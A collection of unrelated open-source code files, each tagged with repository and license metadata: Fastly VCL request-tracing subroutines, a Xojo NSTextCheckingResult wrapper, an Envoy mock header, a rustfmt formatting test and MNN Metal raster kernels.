sub breadcrumb_recv { if (req.restarts == 0) { set req.http.X-VCL-Route = "VCL_RECV"; } else { set req.http.X-VCL-Route = req.http.X-VCL-Route ",VCL_RECV"; } } sub breadcrumb_hash { set req.http.X-VCL-Route = req.http.X-VCL-Route ",VCL_HASH"; } sub breadcrumb_miss { set req.http.X-PreFetch-Miss = ",VCL_MISS"; } sub breadcrumb_pass { set req.http.X-PreFetch-Pass = ",VCL_PASS"; } sub breadcrumb_fetch { set beresp.http.X-VCL-Route = req.http.X-VCL-Route; set beresp.http.X-PreFetch-Pass = req.http.X-PreFetch-Pass; set beresp.http.X-PreFetch-Miss = req.http.X-PreFetch-Miss; set beresp.http.X-PostFetch = ",VCL_FETCH(status: " beresp.status ")"; } sub breadcrumb_deliver { if (resp.http.X-VCL-Route) { set req.http.X-VCL-Route = resp.http.X-VCL-Route; } if (fastly_info.state ~ "^HITPASS") { set req.http.X-VCL-Route = req.http.X-VCL-Route ",VCL_HIT(object: uncacheable, return: pass)"; } elseif (fastly_info.state ~ "^HIT") { set req.http.X-VCL-Route = req.http.X-VCL-Route ",VCL_HIT(" req.http.host req.url ")"; } else { if (resp.http.X-PreFetch-Pass) { set req.http.X-VCL-Route = req.http.X-VCL-Route resp.http.X-PreFetch-Pass; } if (resp.http.X-PreFetch-Miss) { set req.http.X-VCL-Route = req.http.X-VCL-Route resp.http.X-PreFetch-Miss; } if (resp.http.X-PostFetch) { set req.http.X-VCL-Route = req.http.X-VCL-Route resp.http.X-PostFetch; } } set req.http.X-VCL-Route = req.http.X-VCL-Route ",VCL_DELIVER"; }
VCL
3
edenlabllc/polyfill-service
packages/polyfill-service/fastly/vcl/breadcrumbs.vcl
[ "MIT" ]
#tag Class Private Class NSTextCheckingResult Inherits NSObject #tag Method, Flags = &h21 Private Shared Function ClassRef() As Ptr static ref as ptr = NSClassFromString("NSTextCheckingResult") return ref End Function #tag EndMethod #tag Method, Flags = &h0 Function RangeAtIndex(idx as UInteger) As NSRange declare function rangeAtIndex_ lib FoundationLib selector "rangeAtIndex:" (obj_id as ptr, idx as UInteger) as NSRange Return (rangeAtIndex_(self, idx)) End Function #tag EndMethod #tag Method, Flags = &h0 Function ResultByAdjustingRangesWithOffset(offset as Integer) As NSTextCheckingResult declare function resultByAdjustingRangesWithOffset_ lib FoundationLib selector "resultByAdjustingRangesWithOffset:" (obj_id as ptr, offset as Integer) as ptr Return new NSTextCheckingResult(resultByAdjustingRangesWithOffset_(self, offset)) End Function #tag EndMethod #tag ComputedProperty, Flags = &h0 #tag Getter Get declare function numberOfRanges_ lib FoundationLib selector "numberOfRanges" (obj_id as ptr) as UInteger Return numberOfRanges_(self) End Get #tag EndGetter numberOfRanges As UInteger #tag EndComputedProperty #tag ComputedProperty, Flags = &h0 #tag Getter Get declare function range_ lib FoundationLib selector "range" (obj_id as ptr) as NSRange Return (range_(self)) End Get #tag EndGetter range As NSRange #tag EndComputedProperty #tag ComputedProperty, Flags = &h0 #tag Getter Get declare function regularExpression_ lib FoundationLib selector "regularExpression" (obj_id as ptr) as ptr Return new NSRegularExpression(regularExpression_(self)) End Get #tag EndGetter regularExpression As NSRegularExpression #tag EndComputedProperty #tag ViewBehavior #tag ViewProperty Name="Index" Visible=true Group="ID" InitialValue="-2147483648" Type="Integer" EditorType="" #tag EndViewProperty #tag ViewProperty Name="Left" Visible=true Group="Position" InitialValue="0" Type="Integer" EditorType="" #tag EndViewProperty #tag ViewProperty Name="Name" Visible=true Group="ID" InitialValue="" Type="String" EditorType="" #tag EndViewProperty #tag ViewProperty Name="Super" Visible=true Group="ID" InitialValue="" Type="String" EditorType="" #tag EndViewProperty #tag ViewProperty Name="Top" Visible=true Group="Position" InitialValue="0" Type="Integer" EditorType="" #tag EndViewProperty #tag ViewProperty Name="numberOfRanges" Visible=false Group="Behavior" InitialValue="" Type="UInteger" EditorType="" #tag EndViewProperty #tag EndViewBehavior End Class #tag EndClass
Xojo
4
kingj5/iOSKit
Modules/JKRegEx/NSTextCheckingResult.xojo_code
[ "MIT" ]
#pragma once #include "envoy/server/fatal_action_config.h" #include "gmock/gmock.h" namespace Envoy { namespace Server { namespace Configuration { class MockFatalActionFactory : public FatalActionFactory { public: MOCK_METHOD(FatalActionPtr, createFatalActionFromProto, (const envoy::config::bootstrap::v3::FatalAction& config, Instance* server), (override)); MOCK_METHOD(ProtobufTypes::MessagePtr, createEmptyConfigProto, (), (override)); MOCK_METHOD(std::string, name, (), (const, override)); }; } // namespace Configuration } // namespace Server } // namespace Envoy
C
4
dcillera/envoy
test/mocks/server/fatal_action_factory.h
[ "Apache-2.0" ]
fn main() { let in_ = false; for variable_in_x /* ... */ in 0..1 { for variable_in_y /* ... */ in 0..1 { if in_ { } else if in_ { } else { } } } }
Rust
2
ohno418/rust
src/tools/rustfmt/tests/target/issue-5009/5_nested_for_loop_with_connector_in_if_elseif_else.rs
[ "ECL-2.0", "Apache-2.0", "MIT-0", "MIT" ]
// // CoreMLRaster.metal // MNN // // Created by MNN on 2021/04/26. // Copyright © 2018, Alibaba Group Holding Limited // #include <metal_stdlib> using namespace metal; struct SamplerInfo { uint4 stride; //stride[3] + offset uint4 size; //size[3] + totalSize uint4 extent; //dstStride[3]+dstOffset uint4 imageSize; }; kernel void raster_texture(texture2d_array<half, access::read> in [[texture(0)]], texture2d_array<half, access::write> out [[texture(1)]], constant SamplerInfo &info [[buffer(0)]], uint3 gid [[thread_position_in_grid]]) { if (gid.x < info.size.x && gid.y < info.size.y && gid.z < info.size.z) { uint dstOffset = gid.x * info.extent.x + gid.y * info.extent.y + gid.z * info.extent.z + info.extent.w; uint srcOffset = gid.x * info.stride.x + gid.y * info.stride.y + gid.z * info.stride.z + info.stride.w; // out[int(dstOffset)] = in[int(srcOffset)]; // do raster on texture } } kernel void raster(const device int *in [[buffer(0)]], device int *out [[buffer(1)]], constant SamplerInfo &info [[buffer(2)]], uint3 gid [[thread_position_in_grid]]) { if (gid.x < info.size.x && gid.y < info.size.y && gid.z < info.size.z) { uint dstOffset = gid.x * info.extent.x + gid.y * info.extent.y + gid.z * info.extent.z + info.extent.w; uint srcOffset = gid.x * info.stride.x + gid.y * info.stride.y + gid.z * info.stride.z + info.stride.w; out[int(dstOffset)] = in[int(srcOffset)]; } }
Metal
4
foreverlms/MNN
source/backend/coreml/backend/CoreMLRaster.metal
[ "Apache-2.0" ]